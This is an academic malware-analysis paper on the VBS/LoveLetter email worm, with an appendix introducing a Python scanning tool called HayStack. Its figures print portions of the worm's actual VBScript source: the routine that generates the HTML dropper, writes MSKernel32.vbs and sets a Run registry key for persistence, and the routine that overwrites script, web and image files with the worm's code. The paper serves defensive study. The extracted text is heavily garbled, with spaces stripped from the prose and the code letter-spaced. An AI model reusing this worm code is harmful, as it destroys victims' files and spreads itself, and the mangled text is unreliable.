Hoggan1/12

LoveLetter:ATargetedAnalysisUsingHeyStack WrittenBy:RichHoggan ComputerandInformationScience,NotreDamedeNamurUniversity Abstract Malwarehasbecomesuchaglobalthreattotheinternetcommunitythatmalwareanalysisis imperativetowardsunderstandinghowtoprotectagainstit.Thispaperdiscussesthebackgroundofthe VBS/LoveLettervirus,andleadsananalysisthroughitssourcecode.Bothmanualpassiveanalysisis conductedagainstVBS/LoveLetterinadditiontorunningHayStackacustombuiltanalysistool. AreaofFocus:InformationTechnologyemployees,Cybersecurityemployees,ComputerScientists, Cybersecurityenthusiasts,ReverseEngineers Keywords:malwareanalysis,reverseengineering,cybersecurity,computerscience Introduction FromBraintoFlame,computerviruseshavebeenapartoftechnologysincetheverybeginning. Virusescanbefoundinmanyprogramminglanguagesandhavetargetedallmajoroperatingsystems whichnowincludemobileoperatingsystems.Evenwithantivirusprotection,thechancesofbeing infectedandvictimizedbysometypeofmalwarecontinuetogrow.Consideringthisstaggeringgrowth inmalware,malwareanalysisisarequiredtactictowardsprotectingagainstthevarioustypesof malwarethathavegonefromsimplycrashingacomputertowardsstealingprivateinformationandeven financialdata. InthispaperwewillbeprovidingabriefbackgroundoftheVBS/LoveLetteremailworm.And passiveanalysisofVBS/LoveLetterssourcecodewilltakepartduringtherestofthepaper.Assuch, wewillbelookingatthekeycharacteristicsoftheworm,analysingtheprogramminglanguageusedto

Hoggan2/12

writetheworm,isolatingthewormstriggerandpayload,andmanuallyanalyzingthesourcecodes functionality.Inadditiontomanualpassiveanalysis,HayStackacustombuiltanalysistoolwillbe usedtopulloutinformationaboutthevirus.ThisincludessearchingforregistrykeysandURLsthat arereferencedinthesourcecode. ABriefBackgroundofVBS/LoveLetter VBS/LoveLetterwasreleasedintothewildinMayof2000andthefirstnetworkstoshowa presenceofthewormwereinbothAsiaandEurope.Itwouldnttakelong,however,for VBS/LoveLettertoreachtheUnitedStatesaswellasanyoftheothercountrieswithawired infrastructuretotheinternet.Mostnotably,thevirusmanagedtoinfectcomputersassociatedwiththe CentralIntelligenceAgencyandthePentagon[1].Inadditiontothequickpropagationofthevirus, variantsbeganspreadingjustasquickly.Thiswasmostlikelyduetothefactthatthevirusessource codewasavailableafteritsinitialrelease. Consideringthatthevirusspreadthroughemail,thetriggerwasassociatedwithaninfected emailwhichcontainedanattachmentcalledLOVELETTERFORYOU.TXT.vbstowhatusers thoughtwasalovelettersentbysomeoneintheirOutlookaddressbook.Oncetheuserdoubleclicked theattachment,however,thevirusexecutedthuscausinganinfectionoftheusersmachinewhichinturn activatedtheselfpropagationofthevirussendingitselftoeveryoneintheusersOutlookaswellas iteratingthrougheachoftheusersdirectoriesinthefilesystemsearchingforanumberofdifferentfile types.Ifanyofthesefiletypeswerefoundonthefilesystem,theywouldbeoverwrittenwiththe virusessourcecode.Atthispoint,theuserwouldbeinfectedwithVBS/LoveLetter,andbecausethe virusoverwrotefilesontheusersfilesystem,therewouldbenowaytorecovertheoriginalfile.In ordertorecoverlostdata,theuserwouldneededtohaveanuninfectedexternalbackup.Reflectingthis

Hoggan3/12

outcome,somereportsstateddatalossreachingintothetensofthousandsofdollars[2]. PassiveAnalysis ANoteonLaboratorySetup BothmanualandautomatedpassiveanalysiswasconductedonaWindows8.1machine runningPython2.7andtheHayStackmalwareanalysistool. DissectingVirusComponents ProgrammingLanguageUsed VBS/LoveLetterwaswrittenusingtheMicrosoftVBSscriptinglanguage.Whiledecreasingin popularityduetolanguagessuchasPython,VBShasmanyfacetswhichmadeitpopularwithITand systemadministratorsasitcouldhandlemanytypesofautomationtasks.Similarly,theVBSscripting languageisaninterpretedlanguage.Thismeansthatscriptfilesareinterpretedlinebylineasopposed tolanguagessuchasCwheresourcecodemustbepassedthroughacompilerinordertocreatean executablefile.Furthermore,VBSscriptsexecuteoncetheyaredoubleclicked.Thismeantthatwhen usersopenedtheinfectedemail,ordoubleclickedonanyofthefilesthatwereinfectedintheirfile system,theviruswouldexecute.ThiswaspossibleduetothefactthattheWindowsoperatingsystem didntdisplayfiletypesautomaticallybutalsoexecutedVBSfilesautomatically.Eveniftheuserwas moreknowledgeable,therewouldbenowayfortheusertorealizetheywerenotopeningupaweb pagebutexecutingaVBSfileshortofhavingfiletypesdisplayed. PayloadandTrigger ThevirusestriggerconsistedofaninfectedemailwhichconsistedoftheatachedVBSscript. Essentially,thismethodofpropagationworkedbecausetheactualfiletypewashiddenfromtheuser makingitlooklikeasimpleHTMLfileorwebpage.Thuswhentheuseropenedtheemailattachment,

Hoggan4/12

theVBSfileexecutedinstead.Thetriggercanbeseeninfigure1. [Figure1HTMLtriggergeneration]
s u b h t m l O n E r r o r R e s u m e N e x t d i m l i n e s , n , d t a 1 , d t a 2 , d t 1 , d t 2 , d t 3 , d t 4 , l 1 , d t 5 , d t 6 d t a 1 = " < H T M L > < H E A D > < T I T L E > L O V E L E T T E R H T M L < ? ? T I T L E > < M E T A N A M E = @ @ G e n e r a t o r @ @ C O N T E N T = @ @ B A R O K V B S L O V E L E T T E R @ @ > " & v b c r l f & _ " < M E T A N A M E = @ @ A u t h o r @ @ C O N T E N T = @ @ s p y d e r ? ? i s p y d e r @ m a i l . c o m ? ? @ G R A M M E R S o f t G r o u p ? ? M a n i l a , P h i l i p p i n e s ? ? M a r c h 2 0 0 0 @ @ > " & v b c r l f & _ " < M E T A N A M E = @ @ D e s c r i p t i o n @ @ C O N T E N T = @ @ s i m p l e b u t i t h i n k t h i s i s g o o d . . . @ @ > " & v b c r l f & _ " < ? ? H E A D > < B O D Y O N M O U S E O U T = @ @ w i n d o w . n a m e = # # m a i n # # w i n d o w . o p e n ( # # L O V E L E T T E R F O R Y O U . H T M # # , # # m a i n # # ) @ @ " & v b c r l f & _ " O N K E Y D O W N = @ @ w i n d o w . n a m e = # # m a i n # # w i n d o w . o p e n ( # # L O V E L E T T E R F O R Y O U . H T M # # , # # m a i n # # ) @ @ B G P R O P E R T I E S = @ @ f i x e d @ @ B G C O L O R = @ @ # F F 9 9 3 3 @ @ > " & v b c r l f & _ " < C E N T E R > < p > T h i s H T M L f i l e n e e d A c t i v e X C o n t r o l < ? ? p > < p > T o E n a b l e t o r e a d t h i s H T M L f i l e < B R > P l e a s e p r e s s # # Y E S # # b u t t o n t o E n a b l e A c t i v e X < ? ? p > " & v b c r l f & _ " < ? ? C E N T E R > < M A R Q U E E L O O P = @ @ i n f i n i t e @ @ B G C O L O R = @ @ y e l l o w @ @ > z z < ? ? M A R Q U E E > " & v b c r l f & _ " < ? ? B O D Y > < ? ? H T M L > " & v b c r l f & _ " < S C R I P T l a n g u a g e = @ @ J S c r i p t @ @ > " & v b c r l f & _ " < ! ? ? ? ? " & v b c r l f & _ " i f ( w i n d o w . s c r e e n ) { v a r w i = s c r e e n . a v a i l W i d t h v a r h i = s c r e e n . a v a i l H e i g h t w i n d o w . m o v e T o ( 0 , 0 ) w i n d o w . r e s i z e T o ( w i , h i ) } " & v b c r l f & _ " ? ? ? ? > " & v b c r l f & _ " < ? ? S C R I P T > " & v b c r l f & _ " < S C R I P T L A N G U A G E = @ @ V B S c r i p t @ @ > " & v b c r l f & _ " < ! " & v b c r l f & _ " o n e r r o r r e s u m e n e x t " & v b c r l f & _ " d i m f s o , d i r s y s t e m , w r i , c o d e , c o d e 2 , c o d e 3 , c o d e 4 , a w , r e g d i t " & v b c r l f & _ " a w = 1 " & v b c r l f & _ " c o d e = " d t a 2 = " s e t f s o = C r e a t e O b j e c t ( @ @ S c r i p t i n g . F i l e S y s t e m O b j e c t @ @ ) " & v b c r l f & _ " s e t d i r s y s t e m = f s o . G e t S p e c i a l F o l d e r ( 1 ) " & v b c r l f & _ " c o d e 2 = r e p l a c e ( c o d e , c h r ( 9 1 ) & c h r ( 4 5 ) & c h r ( 9 1 ) , c h r ( 3 9 ) ) " & v b c r l f & _ " c o d e 3 = r e p l a c e ( c o d e 2 , c h r ( 9 3 ) & c h r ( 4 5 ) & c h r ( 9 3 ) , c h r ( 3 4 ) ) " & v b c r l f & _ " c o d e 4 = r e p l a c e ( c o d e 3 , c h r ( 3 7 ) & c h r ( 4 5 ) & c h r ( 3 7 ) , c h r ( 9 2 ) ) " & v b c r l f & _ " s e t w r i = f s o . C r e a t e T e x t F i l e ( d i r s y s t e m & @ @ ^ ^ M S K e r n e l 3 2 . v b s @ @ ) " & v b c r l f & _ " w r i . w r i t e c o d e 4 " & v b c r l f & _ " w r i . c l o s e " & v b c r l f & _ " i f ( f s o . F i l e E x i s t s ( d i r s y s t e m & @ @ ^ ^ M S K e r n e l 3 2 . v b s @ @ ) ) t h e n " & v b c r l f & _ " i f ( e r r . n u m b e r = 4 2 4 ) t h e n " & v b c r l f & _ " a w = 0 " & v b c r l f & _ " e n d i f " & v b c r l f & _ " i f ( a w = 1 ) t h e n " & v b c r l f & _ " d o c u m e n t . w r i t e @ @ E R R O R : c a n # # t i n i t i a l i z e A c t i v e X @ @ " & v b c r l f & _ " w i n d o w . c l o s e " & v b c r l f & _ " e n d i f " & v b c r l f & _

Hoggan5/12

" e n d i f " & v b c r l f & _ " S e t r e g e d i t = C r e a t e O b j e c t ( @ @ W S c r i p t . S h e l l @ @ ) " & v b c r l f & _ " r e g e d i t . R e g W r i t e @ @ H K E Y _ L O C A L _ M A C H I N E ^ ^ S o f t w a r e ^ ^ M i c r o s o f t ^ ^ W i n d o w s ^ ^ C u r r e n t V e r s i o n ^ ^ R u n ^ ^ M S K e r n e l 3 2 @ @ , d i r s y s t e m & @ @ ^ ^ M S K e r n e l 3 2 . v b s @ @ " & v b c r l f & _ " ? ? ? ? > " & v b c r l f & _ " < ? ? S C R I P T > " d t 1 = r e p l a c e ( d t a 1 , c h r ( 3 5 ) & c h r ( 4 5 ) & c h r ( 3 5 ) , " ' " ) d t 1 = r e p l a c e ( d t 1 , c h r ( 6 4 ) & c h r ( 4 5 ) & c h r ( 6 4 ) , " " " " ) d t 4 = r e p l a c e ( d t 1 , c h r ( 6 3 ) & c h r ( 4 5 ) & c h r ( 6 3 ) , " / " ) d t 5 = r e p l a c e ( d t 4 , c h r ( 9 4 ) & c h r ( 4 5 ) & c h r ( 9 4 ) , " \ " ) d t 2 = r e p l a c e ( d t a 2 , c h r ( 3 5 ) & c h r ( 4 5 ) & c h r ( 3 5 ) , " ' " ) d t 2 = r e p l a c e ( d t 2 , c h r ( 6 4 ) & c h r ( 4 5 ) & c h r ( 6 4 ) , " " " " ) d t 3 = r e p l a c e ( d t 2 , c h r ( 6 3 ) & c h r ( 4 5 ) & c h r ( 6 3 ) , " / " ) d t 6 = r e p l a c e ( d t 3 , c h r ( 9 4 ) & c h r ( 4 5 ) & c h r ( 9 4 ) , " \ " ) s e t f s o = C r e a t e O b j e c t ( " S c r i p t i n g . F i l e S y s t e m O b j e c t " ) s e t c = f s o . O p e n T e x t F i l e ( W S c r i p t . S c r i p t F u l l N a m e , 1 ) l i n e s = S p l i t ( c . R e a d A l l , v b c r l f ) l 1 = u b o u n d ( l i n e s ) f o r n = 0 t o u b o u n d ( l i n e s ) l i n e s ( n ) = r e p l a c e ( l i n e s ( n ) , " ' " , c h r ( 9 1 ) + c h r ( 4 5 ) + c h r ( 9 1 ) ) l i n e s ( n ) = r e p l a c e ( l i n e s ( n ) , " " " " , c h r ( 9 3 ) + c h r ( 4 5 ) + c h r ( 9 3 ) ) l i n e s ( n ) = r e p l a c e ( l i n e s ( n ) , " \ " , c h r ( 3 7 ) + c h r ( 4 5 ) + c h r ( 3 7 ) ) i f ( l 1 = n ) t h e n l i n e s ( n ) = c h r ( 3 4 ) + l i n e s ( n ) + c h r ( 3 4 ) e l s e l i n e s ( n ) = c h r ( 3 4 ) + l i n e s ( n ) + c h r ( 3 4 ) & " & v b c r l f & _ " e n d i f n e x t s e t b = f s o . C r e a t e T e x t F i l e ( d i r s y s t e m + " \ L O V E L E T T E R F O R Y O U . H T M " ) b . c l o s e s e t d = f s o . O p e n T e x t F i l e ( d i r s y s t e m + " \ L O V E L E T T E R F O R Y O U . H T M " , 2 ) d . w r i t e d t 5 d . w r i t e j o i n ( l i n e s , v b c r l f ) d . w r i t e v b c r l f d . w r i t e d t 6 d . c l o s e e n d s u b

Oncethetriggerwasactivated,thevirusespayloadwassubsequentlyactivated.Thepayloadconsisted ofiteratingthroughthehostfilesystem,lookingfornumerousfiletypesandoverwritingthem. Everythingfrommediafiles(.jpg,.jpeg,.mp3,.mp2),systemfiles(.bat,.com,.ini),webfiles(.htm, .html),andevensourcecodefiles(.vbs,.cpp,c,h)weresusceptibletothepayload.Theonlycaveat beingthatMP3fileswerehiddenasopposedtooverwritten[4].Partofthiscodecanbeseeninfigure 2. [Figure2partofthecodethatsearchesforfilestooverwrite]

i f ( e x t = " v b s " ) o r ( e x t = " v b e " ) t h e n s e t a p = f s o . O p e n T e x t F i l e ( f 1 . p a t h , 2 , t r u e ) a p . w r i t e v b s c o p y

Hoggan6/12

a p . c l o s e e l s e i f ( e x t = " j s " ) o r ( e x t = " j s e " ) o r ( e x t = " c s s " ) o r ( e x t = " w s h " ) o r ( e x t = " s c t " ) o r ( e x t = " h t a " ) t h e n s e t a p = f s o . O p e n T e x t F i l e ( f 1 . p a t h , 2 , t r u e ) a p . w r i t e v b s c o p y a p . c l o s e b n a m e = f s o . G e t B a s e N a m e ( f 1 . p a t h ) s e t c o p = f s o . G e t F i l e ( f 1 . p a t h ) c o p . c o p y ( f o l d e r s p e c & " \ " & b n a m e & " . v b s " ) f s o . D e l e t e F i l e ( f 1 . p a t h ) e l s e i f ( e x t = " j p g " ) o r ( e x t = " j p e g " ) t h e n s e t a p = f s o . O p e n T e x t F i l e ( f 1 . p a t h , 2 , t r u e ) a p . w r i t e v b s c o p y a p . c l o s e s e t c o p = f s o . G e t F i l e ( f 1 . p a t h ) c o p . c o p y ( f 1 . p a t h & " . v b s " ) f s o . D e l e t e F i l e ( f 1 . p a t h ) e l s e i f ( e x t = " m p 3 " ) o r ( e x t = " m p 2 " ) t h e n s e t m p 3 = f s o . C r e a t e T e x t F i l e ( f 1 . p a t h & " . v b s " ) m p 3 . w r i t e v b s c o p y m p 3 . c l o s e s e t a t t = f s o . G e t F i l e ( f 1 . p a t h ) a t t . a t t r i b u t e s = a t t . a t t r i b u t e s + 2 e n d i f

FoundRegistryKeys RunningtheregistrykeyscaninHayStackbringsbackthefollowingoutput. [Figure2HayStackregistrykeyscanresults]

Lookingatfigure2,thevirusmakesanattempttodownloadanexecutablefilecalled WINBUGSFIX.exeintotheInternetExplorerdownloadsdirectory.Withoutalreadyknowingthe historyoftheVBS/LoveLettervirus,itcouldonlybeassumedthatWINBUGSFIX.exeisjustan executableofsomesort,however,suspicionswouldseemtoindicatethatitsmostlikelyanexterior threat,mostlikelyatrojanhorse.Finally,correlationscanbemadebetweencodeinthevirusandthe

Hoggan7/12

registrykeysreferencingMSKernel32.vbsandWin32DLL.vbswhicharebothsystemfilestothe Windowsoperatingsystem.Inthiscase,however,thevirusattemptstoreplacetheactualsystemfiles withitsownsourcecodeduetothefactthatthesefileshave.vbsfileextensions. FoundURLs Consideringthesuspicionsformedfromthepreviousscan,runningtheURLscanonthesource codefurthersoursuspicionsaboutthepotentialtrojanhorseasthereisnowaURLassociatedwiththe sameexecutablefileasshowninfigure3.Inadditiontotheexecutablefile,though,thereisalsoa domainnamewhichwhenresearched,indicatesthatserverhostingthedomainname,skyinet.net, originatesinManila,Philippines.Researchingthisdomainnamealsoindicatesthatitsalsothedomain nameforanInternetServiceProviderorISPinthePhilippines.Onceagain,withoutnotalready knowingthehistoryofthevirus,thisinformationwouldseemtoindicateapotentialoriginforthevirus. [Figure3HayStackURLscanresults]

ConcludingThoughts Whilemuchoftheinformationfoundaboutthisvirushasalreadybeenknownforquitesome time,theexerciseofanalysingpreviouslyreleasedmalwarehelpsinunderstandinghowsuchviruses executeonthehostfilesystemaswellaswhatstepsneedtobetakeninordertoprotectfromdataloss.

Hoggan8/12

ConsideringVBS/LoveLetter,oneofthemostimportantstepsvictimscouldandshouldhavetakenwas maintainbackupsoftheirdataastherewasnowaytorecoverinfecteddata.Similarly,theabilityfor thevirustoexecuteitscodeautomaticallyorwithouttheuserrealizingcodewasgoingtoexecutewas anotherseriousimplicationofthevirus.ThisiswhycurrentversionsofWindowsprovideadialogbox whencodesuchasaVBSfileisgoingtoexecute.Assuch,maintainingthemostrecentantiviruskeys foraparticularantivirusproductisextremelyimportantaswellasnevertrustinganemailattachment unlessithasbeenthoroughlyscannedforviruses.Becausemalwareisconstantlygrowingincomplexity, thesetacticsamongstothersmustbecomepartofbasicinternetusageasitsreallyoneofthemainlines ofdefense.

Hoggan9/12

WorksCited [1]Zetter,Kim."WhenLoveCametoTown:AVirusInvestigation."PCWorld.N.p.,13Nov.2000. Web.08Oct.2013. [2]Crouch,Cameron."LoveLetter'sFalloutContinues."PCWorld.N.p.,5May2000.Web.08Oct. 2013.

Hoggan10/12

AppendixAAnIntroductiontoUsingHayStack WrittenBy:RichHoggan NotreDamedeNamur,ComputerandInformationScience Introduction HayStackwasdesignedasatoolforanalyzingmaliciouscode.Insteadofmanuallylookingthrougha maliciousspecimen,usingHayStack,oneisabletoscanforparticularinformationmoreefficiently. HayStackwasdesignedtoconductthefollowinganalysis: StringScanning RegistryKeyScanning FunctionScanning URLScanning WhenHayStackrunsaparticularscanagainstamaliciousspecimen,thesoftwaregeneratesareportfile whichdetailstheresultsthatwerefound.Similarly,iftheparticularscandoesnotcomebackwith positivescanresults,areportfileisstillgeneratedthusallowingaforensicexaminertobuildacasefor thetypeofmalwarebeinganalyzedregardlessofscanresults. UnderstandingHayStacksScanningCharacteristics StringScanning StringscanningisoneofthesimplestscansthatHayStackrunsagainstamaliciousspecimeninthatit simplylooksforlinesthatincludesingleand/ordoublequotes.Ifalineisfoundcontainingeitherofthe two,itsstoredandlatersenttothecommandlineaswellasthereportfile.Thiscanbeseeninfigure 1.

[Figure1exampleofstringscan] RegistryKeyScanning Whereasstringscanningsimplysearchesforlinescontainingsingleanddoublequotes,registrykey scanninggoesastepfurtherbylookingforanyofthecommonregistrykeysthatmightbereferencedin themaliciouscode.Ifaregistrykeyisfound,itisstoredandpassedtothecommandlineaswellasits

Hoggan11/12

ownreportfile.Figure2showswhatthisoutputmightlooklike.

[Figure2exampleofregistrykeyscanning] FunctionScanning Consideringthefactthatmaliciousspecimenscanbewritteninavarietyoflanguages,itsquitepossible thatfunctions,methods,orsubroutineswillhavebeenwrittensoastofacilitatefunctionalityofthe maliciousspecimen.Nowitshouldbepointedout,thatthewordfunctionisnotreferringtotheuseof functionsdesignedintotheprogramminglanguage,butthefunctionsthatwerewrittenusingthe programminglanguage,suchasinthefollowinglisting. [Listing1exampleofafunction,method,orsubroutine] publicvoidprintHello() { System.out.println(HelloWorld!) } Assuch,HayStackscansforfunctionsbylookingforlinesofcodethatcontainthemosttypicalfunction prototypedeclarationsinthemostpopularprogramminglanguagesincludingVBScript,JavaScript, Java,andC/C++.SimilartoothertypesofscansproducedbyHayStack,thisscanalsogeneratesits ownreporttile.Lastly,theoutputofafunctionscancanbeseeninfigure3.

Hoggan12/12

[Figure3exampleoffunctionscan] URLScanning ThefinalscanconductedbyHayStackisaURLscan.ThisscanessentiallylooksforanytypeofURL whichcanbeanindicatorofanattempteddownloadingofanexternalthreatsuchasatrojanhorseor similarothermaliciousspecimen.Asaresult,theseURLSarestoredandpassedtothecommandline andcustomreportfilewhenthescancompletes.Thiscanbeseeninfigure4.

[Figure4exampleofURLscan] FutureDevelopment ConsideringthefactthatHayStackisstillunderdevelopment,therearemanyfactorswhichneedtobe consideredacrossallofthescantypes.Thesefactorsinclude: Whatgetsstored Whatgetsprintedtothescreenandthevariousreportfiles Thesefactorsshouldbetakenintoaccountduringinitialuse,astheymightproducefalsepositivesas wellaswillchangedramaticallyasdevelopmentcontinues. Moreso,HayStackrunsasacommandlineapplicationwritteninPython.Awebapplicationversionof theapplicationisalsoindevelopmentwhichwillallowforuserstocreateaccountsandscanmalicious codespecimensusingHayStacktoolswithoutrequiringtheuseofthecommandline.Furthermore, additionalfunctionalityrequirementsarebeingaddedtoHayStacksuchthatthetoolwillbeableto exampleexecutablefilesforURLsandsimilarattributesincludingregistrykeysandoperatingsystem functioncalls.Thiswillalsobedevelopedasastandalonescantypeinthecommandlineversionofthe tool.